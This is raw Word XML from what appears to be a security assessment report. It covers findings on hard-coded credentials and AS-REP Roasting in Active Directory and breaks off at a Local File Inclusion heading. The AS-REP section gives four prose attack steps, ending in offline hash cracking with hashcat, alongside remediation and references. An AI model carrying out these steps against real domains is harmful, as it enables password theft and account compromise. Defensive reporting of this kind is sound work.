    <w:p w:rsidR="1380AB36" w:rsidP="0D325B6E" w:rsidRDefault="1380AB36" w14:paraId="79FE8944" w14:textId="34E375B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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380AB36">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediately </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7FB2E949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rotat</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1380AB36">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e all</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5EE11D49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exposed credentials </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5EE11D49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5EE11D49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and audit related systems for unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="66B49800" w14:textId="25A92E8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8947F3D" w:rsidP="0D325B6E" w:rsidRDefault="08947F3D" w14:paraId="41F7FDD0" w14:textId="7FA54785">
      <w:pPr>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8947F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reference</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="59DAB354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05F9B973" w:rsidP="0D325B6E" w:rsidRDefault="05F9B973" w14:paraId="0B009580" w14:textId="79C2A1D2">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R8c8a48f85e014f1c">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="05F9B973">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Vulnerabilities: Use of Hard-Coded Credentials</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="4ABFD090" w:rsidP="0D325B6E" w:rsidRDefault="4ABFD090" w14:paraId="23B9E4A9" w14:textId="3D9A4691">
      <w:pPr>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f163e8847a5e4b7a">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4ABFD090">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MITRE CWE-259: Use of Hard-coded Password</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4ABFD090">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3DC68174" w14:textId="31BD2F61">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="783A52E8" w:rsidP="0D325B6E" w:rsidRDefault="783A52E8" w14:paraId="28D1F98F" w14:textId="0B2EFC3F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>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049304775" w:id="2096320788"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="783A52E8">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="783A52E8">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc2028780398" w:id="1667699864"/>
      <w:bookmarkStart w:name="_Toc1830771593" w:id="1805886139"/>
      <w:bookmarkStart w:name="_Toc1385862053" w:id="441670987"/>
      <w:bookmarkStart w:name="_Toc719993996" w:id="784442226"/>
      <w:bookmarkStart w:name="_Toc321225331" w:id="1160555727"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1F8CA71F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> AS-REP Roasting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1667699864"/>
      <w:bookmarkEnd w:id="1805886139"/>
      <w:bookmarkEnd w:id="441670987"/>
      <w:bookmarkEnd w:id="784442226"/>
      <w:bookmarkEnd w:id="1160555727"/>
      <w:bookmarkEnd w:id="209632078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2805ABAA">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CF8E8D" w14:textId="3B50B5B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E3B5926" w14:textId="4F0A04FA">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F766D0" w14:textId="06DD4F8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3ACE9E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88BB4FC" w14:textId="34D1D16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E7E530F" w14:textId="383C2BBF">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14E59DF3" w14:textId="5314AFF9">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AD79C27" w14:textId="3B1EB9B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6685879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63E23BD" w14:textId="2373468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2859AECC" w14:textId="0269EC90">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03B05C97"/>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042EE75"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="446D6B2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EF73CD" w14:textId="72586DB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1ED07E2" w14:textId="14C18288">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" r:id="R83cdbb0ebec248b8">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="63151947">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72F578D" w14:textId="5FF974B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0A09094" w14:textId="3F1B3FE8">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="0D325B6E">
              <w:rPr/>
              <w:t>Techniq</w:t>
            </w:r>
            <w:r w:rsidR="0D325B6E">
              <w:rPr/>
              <w:t>ue</w:t>
            </w:r>
            <w:r w:rsidR="0D325B6E">
              <w:rPr/>
              <w:t>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7DEA8FC" w14:textId="2132E9AB">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rf939a6781ec34bcc">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve">T1558.004 </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>- Steal or Forge Kerberos Tickets</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>: AS-REP Roasting</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1CC80444">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05897FF"/>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C7521A" w14:textId="4492E42C">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81A22A7" w14:textId="7556997C">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R519d992d658c446f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1047: Audit</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4D257014" w14:textId="4A097115">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60989fb655f64f57">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1027: Password Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="74685A5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21B9A0" w14:textId="459A0B9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B01E424" w14:textId="2AC56102">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45B5C4A" w14:textId="56D62AA8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="2B7A4CAB" w14:textId="7589F9E2">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F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="58307FD0" w14:textId="071E784A">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on the network can request authentication data for a user that does not have Kerberos pre-authentication enabled and receive an encrypted ticket from the Domain Controller. This ticket is encrypted with the </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user’s</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 and an attacker can then take them offline and use brute-force techniques to crack the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1648A125" w14:textId="347B581F">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8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="31A07E30" w14:textId="2241ED71">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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1F8CA71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F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="39DBAF2A" w14:textId="56076AF6">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user account compromise without the attacker needing any prior access. Depending on the privileges of the compromised account, it can result in a breach of sensitive data, unauthorized access to sensitive systems, and operational disruption by </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modifying</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 some services running on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="50B4EAD5" w14:textId="1DD69551">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8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="341AC025" w14:textId="2032A08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1F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="4A669FCD" w14:textId="0162538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Step 1: Enumerate the Active Directory for users with the “Do Not Require Kerberos Preauthentication” feature enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="5BB32325" w14:textId="47F65BEA">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Step 2: Request an AS-REP ticket for the discovered user accounts from the Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="45AB7151" w14:textId="4699CD0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Step 3: Export the received hash to a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="0E6E5674" w14:textId="3EDBA9A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Step 4: Crack the hash offline using a tool like </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hashcat</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 and wordlist like rockyou.txt to recover the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7CA9821E" w14:textId="602A3C6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8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="06E63FDC" w14:textId="26186CFC">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1F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="5051AFAF" w14:textId="2F49974F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="7B4D06B9" w14:textId="0F5DF450">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Enable </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Kerberos</w:t>
      </w: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 xml:space="preserve"> pre-authentication for all user accounts in Active Directory. This is the default setting and should not be disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="5DDF90D0" w14:textId="2587329C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:num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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enforce a strong password policy for all service accounts to prevent hash cracking after AS-REP Roasting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5225006D" w14:textId="61082A06">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1F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="125520AA" w14:textId="1B7BAC6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F8CA71F">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F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="0D8AE57C" w14:textId="2DA0F2C7">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rf87cf682c8eb4d87">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1F8CA71F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>TCM Security - Pre-Authentication in AD Environments</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1F8CA71F" w:rsidP="0D325B6E" w:rsidRDefault="1F8CA71F" w14:paraId="71E489CB" w14:textId="77E572DD">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R1f67c449133b4566">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1F8CA71F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Microsoft - AS-REP Roasting Detection and Prevention</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="23E9B8B8" w14:textId="257FA98C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2FCFBE90" w14:textId="38AF7820">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2961983B" w14:textId="740DBE2D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6630F676" w14:textId="30293EAF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C4C9C4B" w:rsidP="0D325B6E" w:rsidRDefault="5C4C9C4B" w14:paraId="0B8177FB" w14:textId="2A3AF746">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1385096566" w:id="1606917974"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C4C9C4B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C4C9C4B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc176368962" w:id="1885569817"/>
      <w:bookmarkStart w:name="_Toc1020664674" w:id="684730591"/>
      <w:bookmarkStart w:name="_Toc1923657141" w:id="782093213"/>
      <w:bookmarkStart w:name="_Toc1040025933" w:id="1817870437"/>
      <w:bookmarkStart w:name="_Toc77445125" w:id="2074790441"/>
      <w:bookmarkStart w:name="_Toc698844355" w:id="457951314"/>
      <w:bookmarkStart w:name="_Toc685707354" w:id="1626345166"/>
      <w:bookmarkStart w:name="_Toc1914912584" w:id="1265737465"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="246A774E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Local File Inclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1885569817"/>
      <w:bookmarkEnd w:id="684730591"/>
      <w:bookmarkEnd w:id="782093213"/>
      <w:bookmarkEnd w:id="1817870437"/>
      <w:bookmarkEnd w:id="2074790441"/>
      <w:bookmarkEnd w:id="457951314"/>
      <w:bookmarkEnd w:id="1626345166"/>
      <w:bookmarkEnd w:id="1265737465"/>
